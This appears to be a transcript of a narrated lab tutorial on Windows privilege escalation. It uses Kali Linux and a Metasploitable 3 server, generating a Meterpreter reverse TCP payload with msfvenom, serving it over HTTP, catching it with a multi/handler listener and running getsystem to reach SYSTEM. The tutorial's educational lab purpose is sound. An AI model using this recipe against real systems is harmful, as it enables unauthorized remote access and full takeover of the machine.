Bismillahirrahmanirrahim. In this session, I will be explaining the privilege escalation attack using the Kali and Metasploitable 3 Windows 2008 R2 server. So the lab setup is as follows. We need a Kali and Windows vulnerable server. So first of all, what is privilege escalation? It is a process by which an attacker gains elevated access to resources or functionalities on a target system that they were originally not authorized to access. So the privilege escalations can be classified into two categories. One is horizontal, when an attacker gains access of another account with the same level of privilege, then it is called as a horizontal escalation, privilege escalation. A regular user accessing another user's file or using their permission to perform some action. So the attacker privilege as well as the victim privilege, both of the same level. So vertical, for example, an ordinary user gains the privilege of root or administrator, then it is considered as vertical privilege escalation. So to demonstrate the lab, we need to start the MSF console first, and then we have to create a payload using MS Venom. Okay, so this is the payload interpreter to reverse TCP, and L host is the IP of the Kali system from where the payload is generated and delivered to the target. And this is the L port, the port number um, on the Kali Linux, which is listening to the request or traffic from the payload. And this is the payload file which we are generating. So once the payload is generated, we have to deliver to the target using a Python server. So this is enough actually. If you have more than one IP address in the Kali Linux, then this part, that is dash dash bind, can be used. And then using the MSF console. So once the Python server is once the payload is created and the Python server is executed, you can access the payload file using the URL, the IP address, colon, port number. So you can notice the port number here and the name of the payload file. Okay, you can download the payload. Okay, after downloading the payload, then you have to go to the Kali Linux, open another terminal. So in the next terminal, you have to run the MSF console and use the exploit multi-handler exploit and the reverse TCP interpreter payload and set the host, the Kali IP and the port number on which the uh, Kali system would listen to the traffic from the payload. That is what port number we gave in the MS Venom. So once it is done automatically, you can go to the target system, click the run payload, and it would start connecting with the attacker system. Once it is done, if you execute get system, get UID, you can notice that the user privilege is vagrant. It is an ordinary user. So then you execute get system command in the interpreter, which would perform the privilege escalation. So after the privilege escalation, if you check the get user ID, then you get the NT authority/system, which is a highest privilege available in the Windows servers. And this clearly demonstrates the um, vertical privilege escalation. Okay, so now let me demonstrate practically. So I'm opening the terminal in the Kali Linux. So run the MS console with the sudo privilege. So first we have to create the payload. So let me check what is the IP of the Kali. 50.9 is the IP of the Kali. So MS Venom. Okay, then dash P is the payload. So the payload we are going to use is Windows, then interpreter, then reverse TCP, and then lpost, the IP of the Kali Linux, then lport, okay, some port number which is not already used in the system, dash F, exe greater than payload dot exe. So I think I make mistake, MSF Venom. So now the payload is generated. So just go to the open another terminal. So this is the location. If you type ls, you can find the payload.exe available here. So I'm going to start Python 3 and this is optional. Dash dash bind 50.9. This is optional, okay? If you want, you can include, otherwise you can leave. But this is good if you have more than one IP address. So now I have started the Python server. Let me go to the Windows, open the browser, HTTP 192.168.50.9. This is the IP of the Kali. Then payload.exe. So you can see that the file we can now download, save onto the local system. So I'm saving to the desktop here. Payload is here. So once you do this, go back to the Kali and open third terminal now. Sudo msf console. So first terminal we created the msfnm. Then second terminal we ran the Python server to send the payload to the target or the victim system. And this is third one. So we have to run a exploit here. So the name of the exploit is multi-handler exploit. This is the exploit. Use, or you can say search, paste the selection. Okay, so you can see this multi-handler exploit. So I'm going to use this exploit here. So it has selected the generic shell reverse TCP this payload, but what we want is interpreter payload. Okay, so let me copy the payload now. Set payload. So now the payload has changed. Set lhost 192.168.50.9, that is the IP of the Kali, and set lport. Just look at what port number you gave in the MS Venom. Yeah, this is 555. Okay, so 555. Then run the exploit, and what you do is just go to the server and run the payload, then come back, and you can notice the interpreter shell. So reverse TCP shell connection has been established. So now the request came from the victim to the attacker system. Okay, so the attacker was listening on this IP and on this port number, and it readily accepted the request. So immediately it uses the interpreter payload now. Now we get the interpreter shell, and whatever interpreter commands you want to execute, you can do it. But now the focus is privilege escalation. So let's check what is the privilege we got after the reverse TCP connection. So get UID. So it shows that the user what privilege what we got is vagrant. Vagrant, it is an ordinary user. So we want to escalate the attack and get the privilege, higher privilege. We want to perform the vertical privilege escalation. So the command needed is get system. If you want to explore this command, you can use get system -h. So I go for get system here. Get system -h. This is a help. So let me remove the flag and do the get system. And now again get UID. And now you can find that we got the NT authority. Okay, we got the highest privilege which is possible in the Windows server. Um, this privilege escalation was achieved using this command in the interpreter. So first of all, we establish a reverse TCP connection and using a payload which was generated using the MS Venom. And then we ran the multi-handler exploit, and in that we set the interpreter reverse TCP payload, and we set the L host and L port, which is the same as what you gave in the MS Venom while you created the payload. And this got us the interpreter, and then using the get system we obtained the privilege escalation, and using the get UID we identified the level of privilege we have received through the get system attack. So with this I conclude this presentation. Thank you very much.